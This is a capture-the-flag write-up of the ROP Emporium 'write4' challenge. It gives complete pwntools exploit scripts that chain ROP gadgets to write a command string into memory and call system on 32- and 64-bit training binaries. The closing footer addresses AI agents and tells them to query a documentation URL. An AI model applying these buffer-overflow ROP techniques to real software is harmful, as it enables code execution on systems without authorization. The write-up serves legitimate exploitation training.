# write4

### Analysis

We have the same situation as we had in the split challenge, however in this case we do not have the string `/bin/cat flag.txt` lying around in the binary. We'll have to construct this string in the memory and then ask the `system` function to execute this.

So we'll just get right into it and try to build the write primitive that will get us the writing capabilities and the we'll construct the complete `ROP` chain to execution.

First we'll have to find a write able section of the binary that we'll write the data to.

```bash
$ readelf -S ./write432 | grep W
  [19] .init_array       INIT_ARRAY      08049f08 000f08 000004 00  WA  0   0  4
  [20] .fini_array       FINI_ARRAY      08049f0c 000f0c 000004 00  WA  0   0  4
  [21] .jcr              PROGBITS        08049f10 000f10 000004 00  WA  0   0  4
  [22] .dynamic          DYNAMIC         08049f14 000f14 0000e8 08  WA  6   0  4
  [23] .got              PROGBITS        08049ffc 000ffc 000004 04  WA  0   0  4
  [24] .got.plt          PROGBITS        0804a000 001000 000028 04  WA  0   0  4
  [25] .data             PROGBITS        0804a028 001028 000008 00  WA  0   0  4
  [26] .bss              NOBITS          0804a040 001030 00002c 00  WA  0   0 32
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
```

Out of all the write able sections, I tried `.jcr`, `.dynamic`, but only `.data` seemed to be working, I am yet to figure out the reason for this. However, we'll use `.data` section to write the data.

### 32 bit

We have to find rop gadget that will let us write to a memory location, something like the following.

```bash
mov dword ptr [REG1], REG2

# This will write the data from REG2 to the memory 
# location of REG1
```

This is essentially what we are looking for. Another gadget that we'll need is the one that will help us load the appropriate data to the registers.

So the gadgets that I found were the following:

```bash
# Write to memory location
0x08048670 : mov dword ptr [edi], ebp ; ret
# Load the registers with data
0x080486da : pop edi ; pop ebp ; ret
```

So now all we had to do was make the ROP that will write the string chunks of 4 bytes to the appropriate location, for which I wrote the python script to automate the process.

```python
from pwn import *
import re

final_rop = []
store_vals = 	0x080486da
write_str = 	0x08048670
system = 		0x08048430
data =			0x0804a028

def get_hex_arr():
	param = "/bin/cat ./flag.txt;"
	# This splits string to pieces of 4
	arr = re.findall('.{4}', param) 
	return [e[::-1].encode("hex") for e in arr]

i = 0
for chunk in get_hex_arr():
	final_rop.append(p32(store_vals))
	# This is to move the memory location by 4
	# every time we write a chunk of string
	final_rop.append(p32(data + i))
	final_rop.append(p32(int(chunk, 16)))
	final_rop.append(p32(write_str))
	i += 4


print "A"*44 + ''.join(final_rop) + p32(system) + "JUNK" + p32(data)
```

And using this exploit script, we have our flag.

```bash
$ python exploit.py > final.payload; cat final.payload | ./write432 
write4 by ROP Emporium
32bits

Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault
```

### 64 bit

We'll follow the same process as done in 32 bit architecture binary, the only difference will come while loading the parameters for the system function, due to difference in way the x64 load parameters.

```bash
# Write to the memory location
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
# Load the registers with value
0x0000000000400890 : pop r14 ; pop r15 ; ret
```

Python script that will generate the complete exploit

```python
from pwn import *
import re

final_rop = []
store_vals = 	0x0000000000400890
write_str = 	0x0000000000400820
system = 		0x4005e0
data =			0x0000000000601050
write_rdi = 	0x0000000000400893
ret =			0x00000000004005b9

def get_hex_arr():
	# The string has been made of length divisible by 8
	# to fix string padding issues
	param = "/bin/cat ./flag.txt;echo"
	arr = re.findall('.{8}', param)
	return [e[::-1].encode("hex") for e in arr]

i = 0
for chunk in get_hex_arr():
	final_rop.append(p64(store_vals))
	final_rop.append(p64(data + i))
	final_rop.append(p64(int(chunk, 16)))
	final_rop.append(p64(write_str))
	i += 8

# Loading the parameter for system function
final_rop.append(p64(write_rdi))
final_rop.append(p64(data))
final_rop.append(p64(system))


print "A"*40 + ''.join(final_rop)
```

```bash
$ python exploit.py > final.payload ; cat final.payload | ./write4 
write4 by ROP Emporium
64bits

Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}

Segmentation fault
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jtnydv.gitbook.io/wiki/write-ups/rop-emporium/write4.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.